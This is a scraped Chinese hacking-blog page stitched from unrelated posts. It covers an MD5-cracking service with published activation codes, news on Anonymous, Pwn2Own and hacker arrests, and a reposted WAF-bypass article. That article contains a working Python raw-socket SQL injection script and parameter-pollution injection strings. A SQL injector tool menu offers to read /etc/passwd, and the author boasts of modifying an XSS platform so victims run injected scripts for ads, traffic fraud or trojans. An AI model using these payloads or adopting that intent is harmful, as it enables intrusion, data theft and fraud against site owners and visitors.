0x50sec.org

Md5破解现在仍然免费,只是采用了会员制度.

所以没必要注册多个帐号.

注册暂时开放了,访问 会员注册 页面会自动生成一个激活码.

该激活码内有一定数量的所谓”金币”.

该激活码可以用于新帐号注册,不能用于已有帐号充值.

如何获得可用于充值的激活码:

可通过以下方式的任何一种获取可用于充值的激活码(50-5000不等)

1. 在您的博客\空间等做上 md5 破解板块的 友情链接 ,并且截图发送到管理员邮箱

2.提交建议被采纳

3.提交bug被采纳

4.别的方法我没想好的

5.提交成功率髙的字典

6.也可以赞助本站获得激活码

以上方式请通过如下邮箱联系管理员 : root@0x50sec.org

为什么改成这样的?

节约资源,或者其他just for fun~~~

好久没写博客鸟,新年新气象,将md5破解的页面重新做了下.

新增了md5(md5($pass))、md5(md5($pass).$salt) (discuz)等加密方式的破解。

小站资源有限决定对占用资源的部分进行会员制度。

会员注册需要使用邀请码。

先发放20个.

-::激活码                                                        -::金额

2ad454b95d23576cdf33a9f4337922f4     50

再放20个

-::激活码                                                        -::金额

f4cf60f1f153cd710234cd65586296fb     100
4170f1b65b74a7918808393a8656b586     100
38f29aa54cede433a1fb63a8c6f40155     100
5fac5f3e22162d24c56d24f5d34d4574     100
1fafa5d98086085949f87a4fdaf4e162     100
c215d6af0192225d7e1708f0c9d1be93     100
a355c4f9af46d5b79f09719a90637de2     100
1b8baf24d244328ef829ae142a1b15ae     100
05c18d05fc2d4c2040e451d4b3db4d38     100
af6947164fe453dbdcd681fed91e4150     100
89a4f54e31c81ea8f6246aed150bd4f1     100
1a5f3d314552341461bfb906ff10b520     100
9c49fe1f93b6e9bc4aca5a95d5547f53     100
5a5983e93af81f7d6edadbec35e08d6a     100
309ff64f2f208e1384de0208b83a34de     100
5976218171de77b9a4f2198a0fbe4665     100
86395fc102c3d625001ff88bba85647b     100
a2e08390a33f10e0c6f95d7c4ff9eef7     100
cf4d7b1d13da30e2fdeff40755aaaad5     100
ed6bf6d3c103ea4022730be2a4abc09c     100

中新社柏林11月5日电 (记者 黄霜红)日前在网络轰动一时的“匿名者”黑客组织叫板墨西哥贩毒集团事件有了结果，该组织5日向德国媒体证实，遭受绑架的人质已获释。一名“匿名者”南美小组创建者接受德国《镜报》采访时说，他在网络论坛上和那名获释者交流过，该人叙述了自己的姓名以及被绑经过，所有细节都证实了其真实性。
获释者还在论坛上发出警告说，自己获释时遭贩毒集团威胁，如果“匿名者”成员不遵守与贩毒集团协议公布任何毒贩名单，黑客们将为每个名字付出10位家人的生命。
“匿名者”掌握了贩毒集团Zetas的大量信息。几个月前该组织破解了政府公务员的大约上万封电邮，从而侦察到一些公务员和贩毒集团的往来情况，贩毒集团还向一些议员支付“保护费”以避免刑罚。该组织原计划在月底公开部分信息。
在黑客组织一名成员被绑架之后，“匿名者”在网络宣布，如贩毒集团不释放人质，将从本月5日开始逐渐公开Zetas成员以及帮手的名单，毒贩中包括出租司机、记者以及警察。“匿名者”的威胁迅速传遍网络并轰动一时。
网友获释表示“匿名者”的威胁产生作用，该组织已表示不会公布上述信息。“匿名者”解释说，贩毒集团并非该组织的目标，他们主要针对的是政府公务员的腐败行为。
墨西哥贩毒集团Zetas被认为是该国最大最残忍的一个犯罪集团。2006年墨西哥政府公开与之宣战以来，在反毒战斗中丧生的人数达约4.5万。日前获释的黑客成员称和其他4人一道遭绑架，5人中有1人遇害。

浅谈绕过WAF的数种方法:http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html
EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2011-09-06
From: http://www.80sec.com/?p=244

0×00 前言

08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，可以在网站上无差别的进行网页木马攻击。

互联网是快速更新迭代的，但是很多没有开发能力的单位都是通过外包建立网站，网站的程序一上线就再也无人维护，很多程序存在各种漏洞无法修补，于是 WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，通常一个模块一个扩展就能搞定，当然也有耗资百万千万的硬件 WAF，然而如果WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢？所以本文主要解析一些可以绕过WAF的罕见漏洞，供安全人员参考。

0×01 Request对象的包解析漏洞.

asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是 Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC 传过来的数据，但是asp和.net库内置的Request对象完全不按RFC标准来，下面我们可以做个测试：

分别将下面两段代码保存为1.asp和1.aspx

使用asp的Request对象接收t参数传值
———————————————–
＜%
Response.Write “Request:” & Request(“t”)
%＞
———————————————–

使用asp.net的Request对象接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

使用下面的python脚本调用socket发送原始的HTTP包
———————————————–
#!/usr/bin/env python

import socket

host = ’192.168.239.129′
path = ‘/1.asp’
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

exploit_packet=”t=’/**/or/**/1=1–”
exploit_packet+=”\r\n” * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet

print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
———————————————–

我们发送的原始包是：
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

t=’/**/or/**/1=1–

结果返回如下：
Request:’/**/or/**/1=1–
将python测试脚本的path改为/1.aspx测试页返回同样结果。

我们可以看到这是一个畸形的HTTP GET请求包，这个包的奥秘在于t=’/**/or/**/1=1–参数后的8个回车换行和Content-Length头，包的结构类似于一个POST 包，而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。

所以如果WAF没有处理好HTTP包的内容，沿用常规思路处理GET和POST的逻辑的话，那么这个畸形包将会毁掉WAF的基础防御。

0×02 被遗忘的复参攻击.

大家应该还记得09年的HTTP Parameter Pollution攻击，查看[3]文档，可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性，本文将利用这种的特性的攻击简称为复参攻击，用0X01里的例子简单的测试一下:

用GET请求传入两个t参数
GET http://192.168.239.129/1.asp?t=1&t=2
将返回
Request:1, 2

asp和asp.net的Request对象接收了两个参数，并且以逗号分隔，所以便衍生出了[3]文档中的复参SQL注入方法：

Vulnerable code：
SQL=”select key from table where id=”+Request.QueryString(“id”)

This request is successfully performed using the HPP technique：
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

The SQL request becomes：
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,

我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句，如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?

0×03 高级复参攻击.

ASP.NET的Request对象有一个Params属性，ASP.NET程序员在一些程序中会使用Request.Params["xxx"] 传入数据，参考[4]微软MSDN文档我们可以知道Params属性的特性，该属性接收GET,POST和Cookie的传值集合，这里我们可以修改 0×01里的例子测试一下：

使用asp.net的Request.Params方法接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request.Params["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

发送一个POST包，GET,POST,COOKIE三个方法中都带有不同的t参数内容
———————————————–
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2

t=3
———————————————–

结果返回
Request:1,3,2

最后得出结论，Request.Params方法接收的数据是按照GPC顺序整合，看到这里的同学再联想到0×02的复参攻击应该如醍醐灌顶了，我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了？

0×04 后话

WAF是不可能解决所有安全问题的，本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的，差异存在，类似的漏洞也会存在。
本文提到了三种绕过WAF的思路，第一种是我的原创属于0DAY状态，第二种是参考已有的复参攻击，其中第三种高级复参攻击是由Safe3同学提出的，本文也是与Safe3同学讨论他开发的WAF的BUG而来，所以感谢Safe3同学。
另外请大家不要将本文的内容用于非法途径，仅供安全人员参考，谢谢。

参考：
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx

拿福能是一个博客广告联盟。拿福能的千人挑战赛是一个非常成功的营销，目标是召集更多的博主成功注册并加入拿福能，将人民币50,000元平分给活动开始后前1000名加入的每一位博主（每人50元）！

小博客为了那50块钱交域名费，就把自己给卖了。不过话说我还是非常看好这个博客联盟的。

有人来搞好东西当然要欢迎的。1000人都已经到了850多位了，支持的朋友赶紧吧。
拿福能千人挑战赛
千人挑战赛点这里参加。

好久没更新，也没去找文章copy上来了，发现小站做的越来越烂。
现在开放、共享的环境越来越差了…
今天因为需要就临时改了下原来写的一个小脚本，增加了mysql报错方式盲注的小功能,这个功能sqlmap应该有吧，好久没用过了，windows下Havij 1.14 Pro这个工具也用这种方式盲注，所以速度很快。

此外还尝试用C语言写一个web漏洞检测程序。
初步实现是爬行网页，提取url，然后提取url的参数，然后判断是否存在注射。这些东西网上都有，我实现这个玩意主要是检验和提高C语言编程方面的知识，另一方面自己写的可以随意扩展，并且用的时候知道程序在干什么。已经初步实现了检测部分弱智注射了，还存在很多要完善的地方，真正要写个小工具的时候发现并不是那么简单，老有想找个代码参考下的冲动。

[root@localhost]# ./bget.pl

|=—————————————–=|
|=——[ Blind SQL Injector V1.3 ]——–=|
|=——-[ c4rp3nt3r@0x50sec.org ]———=|
|=—————————————–=|

Choose a number to be execute:
[0] sql (from [STDIN])
[1] version()
[2] database()
[3] user()
[4] dump table_schema v5.x
[5] dump table_name (table_schem=database() v5.x)
[6] dump column_name (table_name= [STDIN] v5.x)
[7] fuzz table_name v4.x
[8] fuzz column_name v4.x
[9] fuzz web path(‘read httpd.conf’)
[a] load_file(‘/etc/passwd’)
[b] load_file(‘c:\boot.ini’)
[c] load_file(‘file path from [STDIN]‘)
[d] load_file(‘file path from [STDIN] error base’)
[e] dump table_schema (v5.x error base)
[f] dump table_name (table_schem=database() v5.x error base)
[g] dump column_name (table_name= [STDIN] v5.x error base)
[x] sql (from [STDIN] error base)

Choose a number#

hello xss world!
罪过罪过。
测试了anehta平台，发现并没有想象的那么完美。
不过已经非常强大了，简单修改了两个小地方，目标中了就会立即发邮件，还有就是每个人都执行一条js语句，这个语句可是是挂广告的，刷ip流量的，挂马的什么的。

在周四于加拿大温哥华市举行的2011年Pwn2Own全球黑客大赛上，苹果iPhone 4和RIM黑莓(BlackBerry)Torch 9800手机相继被参赛者攻破，但运行谷歌Android以及微软Windows Phone 7(WP7)的手机当天因参赛者未现身而“固若金汤”。

曾多次参加Pwn2Own大赛并获奖的黑客查理·米勒(Charlie Miller)与其队友迪翁·布拉扎基斯(Dion Blazakis)合作，当天在很短时间内攻破iPhone 4手机。米勒和布拉扎基斯两人都就职于美国安全咨询公司ISE。这也是米勒连续四次在Pwn2Own大赛上获奖。

米勒曾在2008年、2009年以及2010年Pwn2Own大赛上获奖。在此之前，还从未有参赛者在Pwn2Own大赛上连续四次获奖。在去 年举行的Pwn2Own大赛上，米勒对一台苹果MacBook Pro笔记本发起攻击，并攻破该笔记本所预装Snow Leopard操作系统中的Safari浏览器。

米勒周四说：“在往年Pwn2Own大赛开始之前，我们已经找到了相应攻击目标的技术漏洞。但今年的情况却大为不同。在周四比赛开始前一天晚 上，我们仍在寻找iPhone 4的技术漏洞。虽然我们已为此准备了数月时间，但要攻破iPhone 4确实相当困难。”他还表示，在此次攻击iPhone 4过程中，布拉扎基斯功不可没。

Pwn2Own黑客大赛主办方TippingPoint公司规定，参赛者不得对外透露他们所发现产品漏洞的任何技术细节，也不得擅自发布自己所 使用的 攻击代码。按照惯例，TippingPoint将把参赛者所发现的漏洞反馈给相应厂商。在各厂商发布相应漏洞补丁程序之前，大会主办方和参赛者皆不得对外 公布这些漏洞的详细情况。 阅读全文…

正义网海南2月24日电（记者李轩甫 通讯员郭艳华 张芸）远在贵州安顺的犯罪嫌疑人柏留康利用互联网技术，侵入海南省广播电视总台的官方网站，对其服务器进行非法控制并多次登陆该服务器，在该服务器中上传 大量的黑客软件，且其明知利用该服务器对外进行DDOS攻击会导致该服务器网速变慢，影响该服务器的网络访问，仍利用该服务器对外进行数据发包，攻击其他 计算机，导致海南省广播电视总台的官方网站蓝网在近20个小时中无法正常运转。柏留康之行为涉嫌破坏机算机信息系统罪，2月17日，海南省海口市检察院对 柏留康依法批准逮捕。

2010年12月10日，海南省公安厅公共信息网络安全监察处接到报案称，海南广播电视台的官方网站蓝网于2010年10月13日凌晨6点至当 日中午12点被攻击，服务器遭受堵塞导致不能正常运行，网页无法打开，后台无法登陆，导致蓝网瘫痪。2011年1月8日，海口市公安局查得该案的犯罪嫌疑 人在贵州省安顺市，在安顺市公安局公共信息网络安全监察支队的配合下，公安机关在安顺市将犯罪嫌疑人柏留康抓获。 阅读全文…

两年“潜伏”某游戏网站，利用网络漏洞修改消费点数牟利四百余万元。近日，南京玄武警方经过缜密侦查，终于挖出了这名异常狡猾的顶级黑客徐放，毕业于国内 一所著名大学，在读博士，从事能源研究。徐放落网后交代，他入侵游戏网站的目的并不是仅仅为了钱，而是将其视作对自己计算机水平的一种检验，“我就想看 看，以我的水平，要多久才会被人发现，我认为警察永远找不到我。”目前，徐放已被玄武警方以涉嫌非法侵入计算机信息系统犯罪行为刑事拘留。

入侵游戏网站后台修改网站“虚拟银行”数据将产生的虚拟货币转移至朋友的支付宝中再转移给同伙顾伟顾伟将虚拟货币向玩家兜售获利

看黑客之术

他很牛

无声无息盗走“虚拟银行”400万

“快出牌，快出牌”、“糊了”、“不要脸，牌不好就跑”……去年11月，在杭州某棋牌游戏网站上，网友们和往常一样玩得不亦乐乎。但在该网站的后台，网 络管理员的头上却渗出了滴滴冷汗。原来，从去年9月开始，他们就发现网站中存储游戏点数的“虚拟银行”中数据出现了异常。

经常玩网络 游戏的人都知道，玩游戏需要用钱购买游戏点数即网络虚拟货币，杭州这家网站同样如此。在该网站上，网络虚拟货币被称为“银子”。正常情况下，网站的“银 子”储存在“虚拟银行”中，其总量是固定的。让网络管理员异常纳闷的是，“虚拟银行”的“银子”数量每天都固定增加一亿两千万两，相当于人民币一万余元。 而这些“银子”产生后，迅速地被人转卖给其他用户，这一情况使得网站“虚拟银行”的货币不停地贬值。

“肯定是系统被入侵了。”网络管 理员一开始就意识到了这个问题，但是他们运用自己的网络技术查找了两个月，却依然找不到问题所在。“银子”的大量产生，导致该游戏平台的虚拟货币贬值，给 网站造成间接损失人民币400余万元。由于该网站服务器在南京玄武区，网站经营者于去年11月向南京玄武警方报案，请求帮助调查。

阅读全文…